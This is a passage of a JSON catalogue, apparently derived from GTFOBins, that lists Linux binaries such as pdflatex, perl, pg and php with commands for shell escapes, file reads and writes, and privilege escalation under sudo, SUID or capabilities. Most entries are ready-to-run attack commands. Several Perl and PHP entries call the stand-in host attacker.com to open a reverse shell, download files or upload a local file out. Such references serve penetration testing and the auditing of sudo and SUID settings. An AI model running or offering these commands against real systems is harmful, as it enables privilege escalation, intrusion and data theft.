host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-write:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:file-write:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:shell:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:shell:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdflatex:shell:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdftex:shell:0:sudo","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdftex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdftex:shell:0:suid","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdftex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pdftex:shell:0:unprivileged","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdftex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perf:shell:0:sudo","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perf stat /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perf:shell:0:suid","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perf stat /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/perf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perf:shell:0:unprivileged","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perf stat /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:download:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>\"attacker.com\",PeerPort=>80,Proto=>\"tcp\") or die; print $s \"GET /path/to/input-file HTTP/1.1\\r\\nHost: attacker.com\\r\\nMetadata: true\\r\\nConnection: close\\r\\n\\r\\n\"; open(my $fh, \">\", \"/path/to/output-file\") or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq \"\\r\\n\") { $in_content = 1; } } close($s); close($fh);'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:download:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>\"attacker.com\",PeerPort=>80,Proto=>\"tcp\") or die; print $s \"GET /path/to/input-file HTTP/1.1\\r\\nHost: attacker.com\\r\\nMetadata: true\\r\\nConnection: close\\r\\n\\r\\n\"; open(my $fh, \">\", \"/path/to/output-file\") or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq \"\\r\\n\") { $in_content = 1; } } close($s); close($fh);'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:file-read:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:file-read:0:suid","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:file-read:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:reverse-shell:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"perl -e 'use Socket;$i=\"attacker.com\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:reverse-shell:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"perl -e 'use Socket;$i=\"attacker.com\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:shell:0:capabilities","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:shell:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perl -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:shell:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perl -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:shell:1:sudo","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"PERL5OPT=-d PERL5DB='exec \"/bin/sh\"' perl /dev/null","description":"The `/dev/null` part can be omitted, just use `Ctrl-D` in order to spawn the shell.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:shell:1:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"PERL5OPT=-d PERL5DB='exec \"/bin/sh\"' perl /dev/null","description":"The `/dev/null` part can be omitted, just use `Ctrl-D` in order to spawn the shell.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:upload:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"perl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>\"attacker.com\", PeerPort=>80, Proto=>\"tcp\") or die;open(my $file, \"<\", \"/path/to/input-file\") or die;$content = join(\"\", <$file>);close($file);$headers = \"POST / HTTP/1.1\\r\\nHost: attacker.com\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \" . length($content) . \"\\r\\nConnection: close\\r\\n\\r\\n\";print $s $headers . $content;while (<$s>) { }close($s);'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perl:upload:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"perl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>\"attacker.com\", PeerPort=>80, Proto=>\"tcp\") or die;open(my $file, \"<\", \"/path/to/input-file\") or die;$content = join(\"\", <$file>);close($file);$headers = \"POST / HTTP/1.1\\r\\nHost: attacker.com\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \" . length($content) . \"\\r\\nConnection: close\\r\\n\\r\\n\";print $s $headers . $content;while (<$s>) { }close($s);'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perlbug:shell:0:sudo","toolId":"gtfo:perlbug","toolName":"perlbug","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh #'","description":"This requires to press `Enter` serveral times before the shell is spawn.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perlbug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:perlbug:shell:0:unprivileged","toolId":"gtfo:perlbug","toolName":"perlbug","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh #'","description":"This requires to press `Enter` serveral times before the shell is spawn.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perlbug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pexec:shell:0:sudo","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pexec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pexec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pexec:shell:0:suid","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pexec /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pexec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pexec:shell:0:unprivileged","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pexec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pexec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:file-read:0:sudo","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:file-read:0:suid","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:file-read:0:unprivileged","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:shell:0:sudo","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:shell:0:suid","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pg:shell:0:unprivileged","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:0:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:0:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:1:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:1:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:1:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:2:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:2:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:command:2:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:download:0:sudo","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:download:0:suid","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:download:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-read:0:sudo","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not 